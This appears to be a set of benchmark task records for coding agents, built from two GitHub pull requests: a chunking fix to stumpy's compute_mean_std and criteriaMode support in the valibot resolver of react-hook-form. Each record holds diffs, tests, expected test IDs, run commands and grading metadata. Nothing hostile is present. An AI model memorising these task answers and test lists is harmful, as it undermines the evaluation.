σ_Q, include=None, discords=False) Location: stumpy.mstump Inputs: - Q (ndarray, shape (d, m)): query subsequences for each dimension. - T (ndarray, shape (d, n)): time series for each dimension. - m (int): window size. - M_T (ndarray, shape (d, n‑m+1)): rolling means of T (pre‑computed by core.preprocess). - Σ_T (ndarray, shape (d, n‑m+1)): rolling stds of T (pre‑computed by core.preprocess). - μ_Q (ndarray, shape (d,)): mean of each query dimension (from core.preprocess on Q). - σ_Q (ndarray, shape (d,)): std of each query dimension. - include (ndarray, optional): indices of dimensions to include; defaults to all. - discords (bool, optional): flag for discord computation; default False. Outputs: - D (ndarray, shape (d, n‑m+1)): distance matrix; rows where μ_Q is infinite are filled with np.inf, otherwise computed via core.mass. Description: Computes the multi‑dimensional distance profiles for all dimensions, handling dimensions with illegal query statistics by returning infinities. Function: _get_first_mstump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, include=None, discords=False) Location: stumpy.mstump Inputs: - start (int): starting index of the subsequence in T_B. - T_A (ndarray, shape (d, n)): pre‑processed reference series. - T_B (ndarray, shape (d, n)): pre‑processed query series. - m (int): window size. - excl_zone (int): exclusion‑zone half width. - M_T (ndarray): rolling means of T_A. - Σ_T (ndarray): rolling stds of T_A. - μ_Q (ndarray): rolling means of T_B. - σ_Q (ndarray): rolling stds of T_B. - include (ndarray, optional): dimensions to include; default all. - discords (bool, optional): flag for discord computation; default False. Outputs: - (P, PL, PR) (tuple of floats): matrix‑profile value for the start subsequence and the left/right profile values (np.inf if excluded). - (I, IL, IR) (tuple of ints): indices of the nearest neighbor, left neighbor, and right neighbor (‑1 when not defined). Description: Generates the first matrix‑profile entry for a multi‑dimensional STUMP run, applying an exclusion zone and handling illegal query statistics by returning infinities.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -e .", "pip install -q pytest pandas dask distributed coverage flake8 black" ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_core.py tests/test_mstump.py" }
{ "num_modified_files": 8, "num_modified_lines": 202, "pr_author": "mexxexx", "pr_labels": [], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue adds a preprocessing function, exclusion‑zone handling, and NaN/Inf support, and the tests check exactly those behaviours, so the intent is clear and complete. However, the test suite references `utils.replace_inf` without importing the utils module, causing a mismatch between test expectations and the provided code. This is an environment preparation problem rather than a flaw in the specification, so the primary classification is B1. The changes introduce new core functionality, fitting the `core_feat` category, and implementing them requires moderate effort across several modules, estimated at medium difficulty.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "tests reference `utils.replace_inf` but do not import the `utils` module" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
15b290a11ce2389701e16d127365194192b924d4
2020-06-04 14:40:22
codecov-commenter: # [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=h1) Report > Merging [#199](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=desc) into [master](https://codecov.io/gh/TDAmeritrade/stumpy/commit/15b290a11ce2389701e16d127365194192b924d4&el=desc) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199/graphs/tree.svg?width=650&height=150&src=pr&token=u0DooAbGji)](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #199 +/- ## ========================================= Coverage 100.00% 100.00% ========================================= Files 13 13 Lines 1033 1037 +4 ========================================= + Hits 1033 1037 +4 ``` | [Impacted Files](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [stumpy/core.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199/diff?src=pr&el=tree#diff-c3R1bXB5L2NvcmUucHk=) | `100.00% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=footer). Last update [15b290a...71272e1](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
tdameritrade__stumpy-199
diff --git a/stumpy/core.py b/stumpy/core.py index 66b96a9..6e6cb03 100644 --- a/stumpy/core.py +++ b/stumpy/core.py @@ -305,16 +305,20 @@ def compute_mean_std(T, m): for iteration in range(max_iter): try: chunk_size = math.ceil((T.shape[-1] + 1) / num_chunks) + if chunk_size < m: + chunk_size = m mean_chunks = [] std_chunks = [] for chunk in range(num_chunks): start = chunk * chunk_size stop = min(start + chunk_size + m - 1, T.shape[-1]) + if stop - start < m: + break - tmp_mean = np.mean(rolling_window(T[start:stop], m), axis=T.ndim) + tmp_mean = np.mean(rolling_window(T[..., start:stop], m), axis=T.ndim) mean_chunks.append(tmp_mean) - tmp_std = np.nanstd(rolling_window(T[start:stop], m), axis=T.ndim) + tmp_std = np.nanstd(rolling_window(T[..., start:stop], m), axis=T.ndim) std_chunks.append(tmp_std) M_T = np.hstack(mean_chunks)
Fixed Issue #198 This PR fixes issue #198 .
**Title** Robust handling of edge cases in mean‑std computation for rolling windows **Problem** `compute_mean_std` could fail or return incorrect statistics when the data length does not divide evenly into the requested number of chunks, especially when a chunk becomes smaller than the rolling window size. The previous slicing also unintentionally dropped dimensions for multi‑dimensional inputs. **Root Cause** Chunk size was computed without guaranteeing it meets the minimum window length, and slicing omitted the required ellipsis, causing dimension loss and improper handling of short tail segments. **Fix / Expected Behavior** - Enforce a minimum chunk size equal to the rolling window length. - Skip any segment that would be shorter than the window, preventing invalid operations. - Use full‑dimensional slicing to preserve array shape during rolling‑window calculations. - Ensure the function always returns correct mean and standard‑deviation arrays regardless of input length or dimensionality. **Risk & Validation** - Added checks may slightly impact performance on very large datasets; benchmark against prior implementation. - Run the full test suite, with particular focus on edge‑case inputs (short series, high chunk counts, multi‑dimensional arrays) to confirm correctness and absence of regressions.
199
TDAmeritrade/stumpy
diff --git a/tests/test_core.py b/tests/test_core.py index ae1048e..732ae1c 100644 --- a/tests/test_core.py +++ b/tests/test_core.py @@ -1,7 +1,7 @@ import numpy as np import numpy.testing as npt import pandas as pd -from stumpy import core +from stumpy import core, config import pytest import os @@ -101,6 +101,40 @@ def test_compute_mean_std(Q, T): npt.assert_almost_equal(left_Σ_T, right_Σ_T) +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_chunked(Q, T): + m = Q.shape[0] + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 2 + left_μ_Q, left_σ_Q = naive_compute_mean_std(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_chunked_many(Q, T): + m = Q.shape[0] + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 128 + left_μ_Q, left_σ_Q = naive_compute_mean_std(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + @pytest.mark.parametrize("Q, T", test_data) def test_compute_mean_std_multidimensional(Q, T): m = Q.shape[0] @@ -119,6 +153,46 @@ def test_compute_mean_std_multidimensional(Q, T): npt.assert_almost_equal(left_Σ_T, right_Σ_T) +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_multidimensional_chunked(Q, T): + m = Q.shape[0] + + Q = np.array([Q, np.random.uniform(-1000, 1000, [Q.shape[0]])]) + T = np.array([T, T, np.random.uniform(-1000, 1000, [T.shape[0]])]) + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 2 + left_μ_Q, left_σ_Q = naive_compute_mean_std_multidimensional(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std_multidimensional(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_multidimensional_chunked_many(Q, T): + m = Q.shape[0] + + Q = np.array([Q, np.random.uniform(-1000, 1000, [Q.shape[0]])]) + T = np.array([T, T, np.random.uniform(-1000, 1000, [T.shape[0]])]) + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 128 + left_μ_Q, left_σ_Q = naive_compute_mean_std_multidimensional(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std_multidimensional(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + @pytest.mark.parametrize("Q, T", test_data) def test_calculate_squared_distance_profile(Q, T): m = Q.shape[0]
[ "tests/test_core.py::test_compute_mean_std_chunked[Q0-T0]", "tests/test_core.py::test_compute_mean_std_chunked[Q1-T1]", "tests/test_core.py::test_compute_mean_std_chunked[Q2-T2]", "tests/test_core.py::test_compute_mean_std_chunked_many[Q0-T0]", "tests/test_core.py::test_compute_mean_std_chunked_many[Q1-T1]", "tests/test_core.py::test_compute_mean_std_chunked_many[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked_many[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked_many[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked_many[Q2-T2]", "tests/test_core.py::test_calculate_squared_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_squared_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_squared_distance_profile[Q2-T2]", "tests/test_core.py::test_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_mass[Q0-T0]", "tests/test_core.py::test_mass[Q1-T1]", "tests/test_core.py::test_mass[Q2-T2]", "tests/test_core.py::test_mass_nan[Q0-T0]", "tests/test_core.py::test_mass_nan[Q1-T1]", "tests/test_core.py::test_mass_nan[Q2-T2]", "tests/test_core.py::test_mass_inf[Q0-T0]", "tests/test_core.py::test_mass_inf[Q1-T1]", "tests/test_core.py::test_mass_inf[Q2-T2]", "tests/test_core.py::test_preprocess" ]
[ "tests/test_core.py::test_check_dtype_float32", "tests/test_core.py::test_check_dtype_float64", "tests/test_core.py::test_check_window_size", "tests/test_core.py::test_sliding_dot_product[Q0-T0]", "tests/test_core.py::test_sliding_dot_product[Q1-T1]", "tests/test_core.py::test_sliding_dot_product[Q2-T2]", "tests/test_core.py::test_compute_mean_std[Q0-T0]", "tests/test_core.py::test_compute_mean_std[Q1-T1]", "tests/test_core.py::test_compute_mean_std[Q2-T2]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_apply_exclusion_zone", "tests/test_core.py::test_apply_exclusion_zone_multidimensional", "tests/test_core.py::test_array_to_temp_file", "tests/test_core.py::test_get_array_ranges", "tests/test_core.py::test_get_array_ranges_exhausted" ]
Variable: STUMPY_MEAN_STD_NUM_CHUNKS Location: stumpy.config module Inputs: int > 0 – number of chunks to split the time‑series into when computing rolling means and standard deviations (default = 1). Setting this to a larger value enables a chunked (memory‑efficient) implementation. Outputs: None (global configuration flag). The value is read by **stumpy.core.compute_mean_std** to determine the chunk size; changing it alters the internal algorithm but does not affect the function’s return type. Description: Global configuration flag that controls how **core.compute_mean_std** partitions the input series for chunk‑wise mean/std computation. Adjust to trade‑off memory usage vs. speed; must be restored to 1 after use if the default behavior is required.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -e .", "pip install -q pytest pandas dask distributed coverage flake8 black" ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_core.py" }
{ "num_modified_files": 1, "num_modified_lines": 6, "pr_author": "mexxexx", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue only says \"Fixed Issue #198\" without describing the required behavior, while the tests add assertions that compute_mean_std must correctly handle chunked processing via the STUMPY_MEAN_STD_NUM_CHUNKS config. The tests therefore introduce expectations not present in the issue description, indicating an ambiguous or missing specification. No other B‑category signals are evident. Hence the primary problem is an ambiguous spec (B4).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests assert behavior of compute_mean_std under different STUMPY_MEAN_STD_NUM_CHUNKS settings, which is not mentioned in the issue text." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c1d543303e7c0345073b88628604e306dc93d3b6
2023-08-18 13:39:59
github-actions[bot]: **Size Change:** +176 B (+1%) **Total Size:** 25.1 kB | Filename | Size | Change | | | :--- | :---: | :---: | :---: | | `valibot/dist/valibot.js` | 577 B | +56 B (+11%) | ⚠️ | | `valibot/dist/valibot.module.js` | 594 B | +57 B (+11%) | ⚠️ | | `valibot/dist/valibot.umd.js` | 684 B | +63 B (+10%) | ⚠️ | <details><summary>ℹ️ <strong>View Unchanged</strong></summary> | Filename | Size | | :--- | :---: | | `ajv/dist/ajv.js` | 638 B | | `ajv/dist/ajv.module.js` | 597 B | | `ajv/dist/ajv.umd.js` | 751 B | | `arktype/dist/arktype.js` | 327 B | | `arktype/dist/arktype.module.js` | 343 B | | `arktype/dist/arktype.umd.js` | 422 B | | `class-validator/dist/class-validator.js` | 537 B | | `class-validator/dist/class-validator.module.js` | 561 B | | `class-validator/dist/class-validator.umd.js` | 640 B | | `computed-types/dist/computed-types.js` | 386 B | | `computed-types/dist/computed-types.module.js` | 401 B | | `computed-types/dist/computed-types.umd.js` | 477 B | | `dist/resolvers.js` | 359 B | | `dist/resolvers.module.js` | 373 B | | `dist/resolvers.umd.js` | 454 B | | `io-ts/dist/io-ts.js` | 1.28 kB | | `io-ts/dist/io-ts.module.js` | 1.18 kB | | `io-ts/dist/io-ts.umd.js` | 1.41 kB | | `joi/dist/joi.js` | 592 B | | `joi/dist/joi.module.js` | 610 B | | `joi/dist/joi.umd.js` | 698 B | | `nope/dist/nope.js` | 345 B | | `nope/dist/nope.module.js` | 365 B | | `nope/dist/nope.umd.js` | 434 B | | `superstruct/dist/superstruct.js` | 324 B | | `superstruct/dist/superstruct.module.js` | 342 B | | `superstruct/dist/superstruct.umd.js` | 424 B | | `typanion/dist/typanion.js` | 323 B | | `typanion/dist/typanion.module.js` | 336 B | | `typanion/dist/typanion.umd.js` | 418 B | | `typebox/dist/typebox.js` | 464 B | | `typebox/dist/typebox.module.js` | 482 B | | `typebox/dist/typebox.umd.js` | 579 B | | `vest/dist/vest.js` | 480 B | | `vest/dist/vest.module.js` | 443 B | | `vest/dist/vest.umd.js` | 569 B | | `yup/dist/yup.js` | 626 B | | `yup/dist/yup.module.js` | 640 B | | `yup/dist/yup.umd.js` | 729 B | | `zod/dist/zod.js` | 581 B | | `zod/dist/zod.module.js` | 602 B | | `zod/dist/zod.umd.js` | 688 B | </details> <a href="https://github.com/preactjs/compressed-size-action"><sub>compressed-size-action</sub></a>
react-hook-form__resolvers-620
diff --git a/valibot/src/valibot.ts b/valibot/src/valibot.ts index 9569bd4..ec269b1 100644 --- a/valibot/src/valibot.ts +++ b/valibot/src/valibot.ts @@ -7,70 +7,85 @@ import { parse, parseAsync, } from 'valibot'; -import { FieldErrors, FieldError } from 'react-hook-form'; - -type FlatErrors = Record<string, [FieldError, ...FieldError[]]>; +import { FieldErrors, FieldError, appendErrors } from 'react-hook-form'; +const parseErrors = ( + valiErrors: ValiError, + validateAllFieldCriteria: boolean, +): FieldErrors => { + const errors: Record<string, FieldError> = {}; + for (; valiErrors.issues.length;) { + const error = valiErrors.issues[0]; + if (!error.path) { + continue; + } + const _path = error.path.map(({ key }) => key).join('.'); -const parseErrors = (error: ValiError): FieldErrors => { - const errors = error.issues.reduce<FlatErrors>((flatErrors, issue) => { - if (issue.path) { - const path = issue.path.map(({ key }) => key).join('.'); - flatErrors[path] = [ - ...(flatErrors[path] || []), - { - message: issue.message, - type: issue.validation, - }, - ]; + if (!errors[_path]) { + errors[_path] = { message: error.message, type: error.validation }; } - return flatErrors; - }, {}); + if (validateAllFieldCriteria) { + const types = errors[_path].types; + const messages = types && types[error.validation]; - return Object.entries(errors).reduce<FieldErrors>((acc, [path, errors]) => { - const [firstError] = errors; - acc[path] = { - message: firstError.message, - type: firstError.type, - }; + errors[_path] = appendErrors( + _path, + validateAllFieldCriteria, + errors, + error.validation, + messages + ? ([] as string[]).concat(messages as string[], error.message) + : error.message, + ) as FieldError; + } + + valiErrors.issues.shift(); + } - return acc; - }, {}); + return errors; }; export const valibotResolver: Resolver = - ( - schema, - schemaOptions = { - abortEarly: false, - abortPipeEarly: false, - }, - resolverOptions = { - mode: 'async', - raw: false, - }, - ) => - async (values, _, options) => { - try { - const { mode, raw } = resolverOptions; - const parsed = - mode === 'sync' - ? parse(schema as BaseSchema, values, schemaOptions) - : await parseAsync( + (schema, schemaOptions, resolverOptions = {}) => + async (values, _, options) => { + try { + const schemaOpts = Object.assign( + {}, + { + abortEarly: false, + abortPipeEarly: false, + }, + schemaOptions, + ); + + const parsed = + resolverOptions.mode === 'sync' + ? parse(schema as BaseSchema, values, schemaOpts) + : await parseAsync( schema as BaseSchema | BaseSchemaAsync, values, - schemaOptions, + schemaOpts, ); - return { values: raw ? values : parsed, errors: {} as FieldErrors }; - } catch (error) { - if (error instanceof ValiError) { return { - values: {}, - errors: toNestError(parseErrors(error), options), + values: resolverOptions.raw ? values : parsed, + errors: {} as FieldErrors, }; - } + } catch (error) { + if (error instanceof ValiError) { + return { + values: {}, + errors: toNestError( + parseErrors( + error, + !options.shouldUseNativeValidation && + options.criteriaMode === 'all', + ), + options, + ), + }; + } - throw error; - } - }; + throw error; + } + };
feat(valibot): add more tests, support of `criteriaMode` and reduce size
**Title** Add full `criteriaMode` support to Valibot resolver and streamline defaults **Problem** The resolver only returned the first validation error per field, ignoring the `criteriaMode: 'all'` option. Default schema options were also not merged reliably, leading to inconsistent behavior across sync/async modes. **Root Cause** Error parsing treated each field as a single error and omitted the flag indicating whether to collect all criteria. Additionally, schema option handling was hard‑coded instead of being merged with user‑provided values. **Fix / Expected Behavior** - Respect `criteriaMode` by aggregating all validation errors for a field when set to `'all'`. - Use the core `appendErrors` utility to build the full error set per field. - Merge default schema options with any user‑supplied options to ensure consistent parsing. - Preserve existing behavior for `criteriaMode` default (`'firstError'`) and for both sync and async parsing modes. - Reduce bundle size by simplifying resolver construction and option handling. **Risk & Validation** - Verify that existing form validation tests still pass unchanged. - Add tests confirming that multiple errors are returned per field when `criteriaMode: 'all'` is used. - Manually test both synchronous and asynchronous schema parsing paths to ensure error aggregation works correctly.
620
react-hook-form/resolvers
diff --git a/valibot/src/__tests__/Form-native-validation.tsx b/valibot/src/__tests__/Form-native-validation.tsx new file mode 100644 index 0000000..4439cbb --- /dev/null +++ b/valibot/src/__tests__/Form-native-validation.tsx @@ -0,0 +1,81 @@ +import React from 'react'; +import { useForm } from 'react-hook-form'; +import { render, screen } from '@testing-library/react'; +import user from '@testing-library/user-event'; +import { string, required, object, minLength } from 'valibot'; +import { valibotResolver } from '..'; + +const USERNAME_REQUIRED_MESSAGE = 'username field is required'; +const PASSWORD_REQUIRED_MESSAGE = 'password field is required'; + +const schema = required( + object({ + username: string(USERNAME_REQUIRED_MESSAGE, [ + minLength(2, USERNAME_REQUIRED_MESSAGE), + ]), + password: string(PASSWORD_REQUIRED_MESSAGE, [ + minLength(2, PASSWORD_REQUIRED_MESSAGE), + ]), + }), +); + +type FormData = { username: string; password: string }; + +interface Props { + onSubmit: (data: FormData) => void; +} + +function TestComponent({ onSubmit }: Props) { + const { register, handleSubmit } = useForm<FormData>({ + resolver: valibotResolver(schema), + shouldUseNativeValidation: true, + }); + + return ( + <form onSubmit={handleSubmit(onSubmit)}> + <input {...register('username')} placeholder="username" /> + + <input {...register('password')} placeholder="password" /> + + <button type="submit">submit</button> + </form> + ); +} + +test("form's native validation with Zod", async () => { + const handleSubmit = vi.fn(); + render(<TestComponent onSubmit={handleSubmit} />); + + // username + let usernameField = screen.getByPlaceholderText( + /username/i, + ) as HTMLInputElement; + expect(usernameField.validity.valid).toBe(true); + expect(usernameField.validationMessage).toBe(''); + + // password + let passwordField = screen.getByPlaceholderText( + /password/i, + ) as HTMLInputElement; + expect(passwordField.validity.valid).toBe(true); + expect(passwordField.validationMessage).toBe(''); + + await user.click(screen.getByText(/submit/i)); + + // username + usernameField = screen.getByPlaceholderText(/username/i) as HTMLInputElement; + expect(usernameField.validity.valid).toBe(false); + expect(usernameField.validationMessage).toBe(USERNAME_REQUIRED_MESSAGE); + + // password + passwordField = screen.getByPlaceholderText(/password/i) as HTMLInputElement; + expect(passwordField.validity.valid).toBe(false); + expect(passwordField.validationMessage).toBe(PASSWORD_REQUIRED_MESSAGE); + + await user.type(screen.getByPlaceholderText(/password/i), 'password'); + + // password + passwordField = screen.getByPlaceholderText(/password/i) as HTMLInputElement; + expect(passwordField.validity.valid).toBe(true); + expect(passwordField.validationMessage).toBe(''); +}); diff --git a/valibot/src/__tests__/Form.tsx b/valibot/src/__tests__/Form.tsx new file mode 100644 index 0000000..058a9c8 --- /dev/null +++ b/valibot/src/__tests__/Form.tsx @@ -0,0 +1,61 @@ +import React from 'react'; +import { render, screen } from '@testing-library/react'; +import user from '@testing-library/user-event'; +import { useForm } from 'react-hook-form'; +import { string, required, object, minLength } from 'valibot'; +import { valibotResolver } from '..'; + +const USERNAME_REQUIRED_MESSAGE = 'username field is required'; +const PASSWORD_REQUIRED_MESSAGE = 'password field is required'; + +const schema = required( + object({ + username: string(USERNAME_REQUIRED_MESSAGE, [ + minLength(2, USERNAME_REQUIRED_MESSAGE), + ]), + password: string(PASSWORD_REQUIRED_MESSAGE, [ + minLength(2, PASSWORD_REQUIRED_MESSAGE), + ]), + }), +); + +type FormData = { username: string; password: string }; + +interface Props { + onSubmit: (data: FormData) => void; +} + +function TestComponent({ onSubmit }: Props) { + const { + register, + handleSubmit, + formState: { errors }, + } = useForm<FormData>({ + resolver: valibotResolver(schema), // Useful to check TypeScript regressions + }); + + return ( + <form onSubmit={handleSubmit(onSubmit)}> + <input {...register('username')} /> + {errors.username && <span role="alert">{errors.username.message}</span>} + + <input {...register('password')} /> + {errors.password && <span role="alert">{errors.password.message}</span>} + + <button type="submit">submit</button> + </form> + ); +} + +test("form's validation with Valibot and TypeScript's integration", async () => { + const handleSubmit = vi.fn(); + render(<TestComponent onSubmit={handleSubmit} />); + + expect(screen.queryAllByRole('alert')).toHaveLength(0); + + await user.click(screen.getByText(/submit/i)); + + expect(screen.getByText(/username field is required/i)).toBeInTheDocument(); + expect(screen.getByText(/password field is required/i)).toBeInTheDocument(); + expect(handleSubmit).not.toHaveBeenCalled(); +}); diff --git a/valibot/src/__tests__/__fixtures__/data.ts b/valibot/src/__tests__/__fixtures__/data.ts index c0c9360..c390572 100644 --- a/valibot/src/__tests__/__fixtures__/data.ts +++ b/valibot/src/__tests__/__fixtures__/data.ts @@ -12,6 +12,7 @@ import { array, boolean, required, + union } from 'valibot'; export const schema = required( @@ -28,7 +29,7 @@ export const schema = required( minLength(8, 'Must be at least 8 characters in length'), ]), repeatPassword: string('Repeat Password is required'), - accessToken: string('Access token is required'), + accessToken: union([string('Access token should be a string'), number('Access token should be a number')], "access token is required"), birthYear: number('Please enter your birth year', [ minValue(1900), maxValue(2013), diff --git a/valibot/src/__tests__/__snapshots__/valibot.ts.snap b/valibot/src/__tests__/__snapshots__/valibot.ts.snap index 96be6d9..bf5ed90 100644 --- a/valibot/src/__tests__/__snapshots__/valibot.ts.snap +++ b/valibot/src/__tests__/__snapshots__/valibot.ts.snap @@ -77,3 +77,342 @@ exports[`valibotResolver > should return a single error from valibotResolver whe "values": {}, } `; + +exports[`valibotResolver > should return a single error from valibotResolver with \`mode: sync\` when validation fails 1`] = ` +{ + "errors": { + "accessToken": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + "birthYear": { + "message": "Please enter your birth year", + "ref": undefined, + "type": "number", + }, + "email": { + "message": "Invalid email address", + "ref": { + "name": "email", + }, + "type": "email", + }, + "enabled": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + "like": { + "id": { + "message": "Like id is required", + "ref": undefined, + "type": "number", + }, + "name": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + }, + "password": { + "message": "One uppercase character", + "ref": { + "name": "password", + }, + "type": "regex", + }, + "repeatPassword": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + "tags": [ + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + }, + ], + "username": { + "message": "Invalid type", + "ref": { + "name": "username", + }, + "type": "non_optional", + }, + }, + "values": {}, +} +`; + +exports[`valibotResolver > should return all the errors from valibotResolver when validation fails with \`validateAllFieldCriteria\` set to true 1`] = ` +{ + "errors": { + "accessToken": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "birthYear": { + "message": "Please enter your birth year", + "ref": undefined, + "type": "number", + "types": { + "number": "Please enter your birth year", + }, + }, + "email": { + "message": "Invalid email address", + "ref": { + "name": "email", + }, + "type": "email", + "types": { + "email": "Invalid email address", + }, + }, + "enabled": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + 